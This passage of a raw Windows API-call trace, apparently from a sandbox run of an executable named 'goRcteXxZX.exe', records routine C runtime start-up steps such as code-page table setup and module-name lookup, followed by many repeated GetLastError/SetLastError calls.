lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0035.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x13209f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0035.008] FreeEnvironmentStringsW (penv=0x2f79b8) returned 1 [0035.008] GetStartupInfoA (in: lpStartupInfo=0x12fa4c | out: lpStartupInfo=0x12fa4c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0035.009] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0035.009] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0035.009] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0035.009] SetHandleCount (uNumber=0x20) returned 0x20 [0035.009] GetLastError () returned 0x0 [0035.009] SetLastError (dwErrCode=0x0) [0035.009] GetLastError () returned 0x0 [0035.009] SetLastError (dwErrCode=0x0) [0035.009] GetLastError () returned 0x0 [0035.009] SetLastError (dwErrCode=0x0) [0035.009] GetACP () returned 0x4e4 [0035.009] GetLastError () returned 0x0 [0035.009] SetLastError (dwErrCode=0x0) [0035.009] IsValidCodePage (CodePage=0x4e4) returned 1 [0035.009] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fa2c | out: lpCPInfo=0x12fa2c) returned 1 [0035.009] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f4f8 | out: lpCPInfo=0x12f4f8) returned 1 [0035.009] GetLastError () returned 0x0 [0035.009] SetLastError (dwErrCode=0x0) [0035.009] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x12f488 | out: lpCharType=0x12f488) returned 1 [0035.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f90c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f90c, cbMultiByte=256, lpWideCharStr=0x12f278, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0035.009] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x12f50c | out: lpCharType=0x12f50c) returned 1 [0035.009] GetLastError () returned 0x0 [0035.009] SetLastError (dwErrCode=0x0) [0035.009] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0035.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f90c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f90c, cbMultiByte=256, lpWideCharStr=0x12f248, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.009] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0035.009] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x12f038, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.009] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x12f80c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿV®gôDú\x12", lpUsedDefaultChar=0x0) returned 256 [0035.009] GetLastError () returned 0x0 [0035.009] SetLastError (dwErrCode=0x0) [0035.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f90c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f90c, cbMultiByte=256, lpWideCharStr=0x12f268, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.009] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0035.010] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x12f058, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0035.010] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x12f70c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿV®gôDú\x12", lpUsedDefaultChar=0x0) returned 256 [0035.010] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.010] GetLastError () returned 0x0 [0035.010] SetLastError (dwErrCode=0x0) [0035.010] GetLastError () returned 0x0 [0035.010] SetLastError (dwErrCode=0x0) [0035.010] GetLastError () returned 0x0 [0035.010] SetLastError (dwErrCode=0x0) [0035.010] GetLastError () returned 0x0 [0035.010] SetLastError (dwErrCode=0x0) [0035.010] GetLastError () returned 0x0 [0035.010] SetLastError (dwErrCode=0x0) [0035.010] GetLastError () returned 0x0 [0035.010] SetLastError (dwErrCode=0x0) [0035.010] GetLastError () returned 0x0 [0035.010] SetLastError (dwErrCode=0x0) [0035.010] GetLastError () returned 0x0 [0035.010] SetLastError (dwErrCode=0x0) [0035.010] GetLastError () returned 0x0 [0035.010] SetLastError (dwErrCode=0x0) [0035.010] GetLastError () returned 0x0 [0035.010] SetLastError (dwErrCode=0x0) [0035.010] GetLastError () returned 0x0 [0035.010] SetLastError (dwErrCode=0x0) [0035.010] GetLastError () returned 0x0 [0035.010] SetLastError (dwErrCode=0x0) [0035.010] GetLastError () returned 0x0 [0035.010] SetLastError (dwErrCode=0x0) [0035.010] GetLastError () returned 0x0 [0035.011] SetLastError (dwErrCode=0x0) [0035.011] GetLastError () returned 0x0 [0035.011] SetLastError (dwErrCode=0x0) [0035.011] GetLastError () returned 0x0 [0035.011] SetLastError (dwErrCode=0x0) [0035.011] GetLastError () returned 0x0 [0035.011] SetLastError (dwErrCode=0x0) [0035.011] GetLastError () returned 0x0 [0035.011] SetLastError (dwErrCode=0x0) [0035.011] GetLastError () returned 0x0 [0035.011] SetLastError (dwErrCode=0x0) [0035.011] GetLastError () returned 0x0 [0035.011] SetLastError (dwErrCode=0x0) [0035.011] GetLastError () returned 0x0 [0035.011] SetLastError (dwErrCode=0x0) [0035.011] GetLastError () returned 0x0 [0035.011] SetLastError (dwErrCode=0x0) [0035.011] GetLastError () returned 0x0 [0035.011] SetLastError (dwErrCode=0x0) [0035.011] GetLastError () returned 0x0 [0035.011] SetLastError (dwErrCode=0x0) [0035.011] GetLastError () returned 0x0 [0035.011] SetLastError (dwErrCode=0x0) [0035.011] GetLastError () returned 0x0 [0035.011] SetLastError (dwErrCode=0x0) [0035.011] GetLastError () returned 0x0 [0035.011] SetLastError (dwErrCode=0x0) [0035.011] GetLastError () returned 0x0 [0035.011] SetLastError (dwErrCode=0x0) [0035.011] GetLastError () returned 0x0 [0035.011] SetLastError (dwErrCode=0x0) [0035.011] GetLastError () returned 0x0 [0035.011] SetLastError (dwErrCode=0x0) [0035.011] GetLastError () returned 0x0 [0035.011] SetLastError (dwErrCode=0x0) [0035.012] GetLastError () returned 0x0 [0035.012] SetLastError (dwErrCode=0x0) [0035.012] GetLastError () returned 0x0 [0035.012] SetLastError (dwErrCode=0x0) [0035.012] GetLastError () returned 0x0 [0035.012] SetLastError (dwErrCode=0x0) [0035.012] GetLastError () returned 0x0 [0035.012] SetLastError (dwErrCode=0x0) [0035.012] GetLastError () returned 0x0 [0035.012] SetLastError (dwErrCode=0x0) [0035.012] GetLastError () returned 0x0 [0035.012] SetLastError (dwErrCode=0x0) [0035.012] GetLastError () returned 0x0 [0035.012] SetLastError (dwErrCode=0x0) [0035.012] GetLastError () returned 0x0 [0035.012] SetLastError (dwErrCode=0x0) [0035.012] GetLastError () returned 0x0 [0035.012] SetLastError (dwErrCode=0x0) [0035.012] GetLastError () returned 0x0 [0035.012] SetLastError (dwErrCode=0x0) [0035.012] GetLastError () returned 0x0 [0035.012] SetLastError (dwErrCode=0x0) [0035.012] GetLastError () returned 0x0 [0035.012] SetLastError (dwErrCode=0x0) [0035.012] GetLastError () returned 0x0 [0035.012] SetLastError (dwErrCode=0x0) [0035.012] GetLastError () returned 0x0 [0035.012] SetLastError (dwErrCode=0x0) [0035.012] GetLastError () returned 0x0 [0035.012] SetLastError (dwErrCode=0x0) [0035.012] GetLastError () returned 0x0 [0035.012] SetLastError (dwErrCode=0x0) [0035.012] GetLastError () returned 0x0 [0035.012] SetLastError (dwErrCode=0x0) [0035.013] GetLastError () returned 0x0 [0035.013] SetLastError (dwErrCode=0x0) [0035.013] GetLastError () returned 0x0 [0035.013] SetLastError (dwErrCode=0x0) [0035.013] GetLastError () returned 0x0 [0035.013] SetLastError (dwErrCode=0x0) [0035.013] GetLastError () returned 0x0 [0035.013] SetLastError (dwErrCode=0x0) [0035.013] GetLastError () returned 0x0 [0035.013] SetLastError (dwErrCode=0x0) [0035.013] GetLastError () returned 0x0 [0035.013] SetLastError (dwErrCode=0x0) [0035.013] GetLastError () returned 0x0 [0035.013] SetLastError (dwErrCode=0x0) [0035.013] GetLastError () returned 0x0 [0035.013] SetLastError (dwErrCode=0x0) [0035.013] GetLastError () returned 0x0 [0035.013] SetLastError (dwErrCode=0x0) [0035.013] GetLastError () returned 0x0 [0035.013] SetLastError (dwErrCode=0x0) [0035.013] GetLastError () returned 0x0 [0035.013] SetLastError (dwErrCode=0x0) [0035.013] GetLastError () returned 0x0 [0035.013] SetLastError (dwErrCode=0x0) [0035.013] GetLastError () returned 0x0 [0035.013] SetLastError (dwErrCode=0x0) [0035.013] GetLastError () returned 0x0 [0035.013] SetLastError (dwErrCode=0x0) [0035.013] GetLastError () returned 0x0 [0035.013] SetLastError (dwErrCode=0x0) [0035.013] GetLastError () returned 0x0 [0035.014] SetLastError (dwErrCode=0x0) [0035.014] GetLastError () returned 0x0 [0035.014] SetLastError (dwErrCode=0x0) [0035.014] GetLastError () returned 0x0 [0035.014] SetLastError (dwErrCode=0x0) [0035.014] GetLastError () returned 0x0 [0035.014] SetLastError (dwErrCode=0x0) [0035.014] GetLastError () returned 0x0 [0035.014] SetLastError (dwErrCode=0x0) [0035.014] GetLastError () returned 0x0 [0035.014] SetLastError (dwErrCode=0x0) [0035.014] GetLastError () returned 0x0 [0035.014] SetLastError (dwErrCode=0x0) [0035.014] GetLastError () returned 0x0 [0035.014] SetLastError (dwErrCode=0x0) [0035.014] GetLastError () returned 0x0 [0035.014] SetLastError (dwErrCode=0x0) [0035.014] GetLastError () returned 0x0 [0035.014] SetLastError (dwErrCode=0x0) [0035.014] GetLastError () returned 0x0 [0035.014] SetLastError (dwErrCode=0x0) [0035.014] GetLastError () returned 0x0 [0035.014] SetLastError (dwErrCode=0x0) [0035.014] GetLastError () returned 0x0 [0035.014] SetLastError (dwErrCode=0x0) [0035.014] GetLastError () returned 0x0 [0035.014] SetLastError (dwErrCode=0x0) [0035.014] GetLastError () returned 0x0 [0035.014] SetLastError (dwErrCode=0x0) [0035.014] GetLastError () returned 0x0 [0035.014] SetLastError (dwErrCode=0x0) [0035.014] GetLastError () returned 0x0 [0035.014] SetLastError (dwErrCode=0x0) [0035.014] GetLastError () returned 0x0 [0035.015] SetLastError (dwErrCode=0x0) [0035.015] GetLastError () returned 0x0 [0035.015] SetLastError (dwErrCode=0x0) [0035.015] GetLastError () returned 0x0 [0035.015] SetLastError (dwErrCode=0x0) [0035.015] GetLastError () returned 0x0 [0035.015] SetLastError (dwErrCode=0x0) [0035.015] GetLastError () returned 0x0 [0035.015] SetLastError (dwErrCode=0x0) [0035.015] GetLastError () returned 0x0 [0035.015] SetLastError (dwErrCode=0x0) [0035.015] GetLastError () returned 0x0 [0035.015] SetLastError (dwErrCode=0x0) [0035.015] GetLastError () returned 0x0 [0035.015] SetLastError (dwErrCode=0x0) [0035.015] GetLastError () returned 0x0 [0035.015] SetLastError (dwErrCode=0x0) [0035.015] GetLastError () returned 0x0 [0035.015] SetLastError (dwErrCode=0x0) [0035.015] GetLastError () returned 0x0 [0035.015] SetLastError (dwErrCode=0x0) [0035.015] GetLastError () returned 0x0 [0035.015] SetLastError (dwErrCode=0x0) [0035.015] GetLastError () returned 0x0 [0035.015] SetLastError (dwErrCode=0x0) [0035.015] GetLastError () returned 0x0 [0035.015] SetLastError (dwErrCode=0x0) [0035.015] GetLastError () returned 0x0 [0035.015] SetLastError (dwErrCode=0x0) [0035.015] GetLastError () returned 0x0 [0035.015] SetLastError (dwErrCode=0x0) [0035.015] GetLastError () returned 0x0 [0035.015] SetLastError (dwErrCode=0x0) [0035.015] GetLastError () returned 0x0 [0035.016] SetLastError (dwErrCode=0x0) [0035.016] GetLastError () returned 0x0 [0035.016] SetLastError (dwErrCode=0x0) [0035.016] GetLastError () returned 0x0 [0035.016] SetLastError (dwErrCode=0x0) [0035.016] GetLastError () returned 0x0 [0035.016] SetLastError (dwErrCode=0x0) [0035.016] GetLastError () returned 0x0 [0035.016] SetLastError (dwErrCode=0x0) [0035.016] GetLastError () returned 0x0 [0035.016] SetLastError (dwErrCode=0x0) [0035.016] GetLastError () returned 0x0 [0035.016] SetLastError (dwErrCode=0x0) [0035.016] GetLastError () returned 0x0 [0035.016] SetLastError (dwErrCode=0x0) [0035.016] GetLastError () returned 0x0 [0035.016] SetLastError (dwErrCode=0x0) [0035.016] GetLastError () returned 0x0 [0035.016] SetLastError (dwErrCode=0x0) [0035.016] GetLastError () returned 0x0 [0035.016] SetLastError (dwErrCode=0x0) [0035.016] GetLastError () returned 0x0 [0035.016] SetLastError (dwErrCode=0x0) [0035.016] GetLastError () returned 0x0 [0035.016] SetLastError (dwErrCode=0x0) [0035.016] GetLastError () returned 0x0 [0035.016] SetLastError (dwErrCode=0x0) [0035.016] GetLastError () returned 0x0 [0035.016] SetLastError (dwErrCode=0x0) [0035.016] GetLastError () returned 0x0 [0035.016] SetLastError (dwErrCode=0x0) [0035.016] GetLastError () returned 0x0 [0035.016] SetLastError (dwErrCode=0x0) [0035.016] GetLastError () returned 0x0 [0035.017] SetLastError (dwErrCode=0x0) [0035.017] GetLastError () returned 0x0 [0035.017] SetLastError (dwErrCode=0x0) [0035.017] GetLastError () returned 0x0 [0035.017] SetLastError (dwErrCode=0x0) [0035.017] GetLastError () returned 0x0 [0035.017] SetLastError (dwErrCode=0x0) [0035.017] GetLastError () returned 0x0 [0035.017] SetLastError (dwErrCode=0x0) [0035.017] GetLastError () returned 0x0 [0035.017] SetLastError (dwErrCode=0x0) [0035.017] GetLastError () returned 0x0 [0035.017] SetLastError (dwErrCode=0x0) 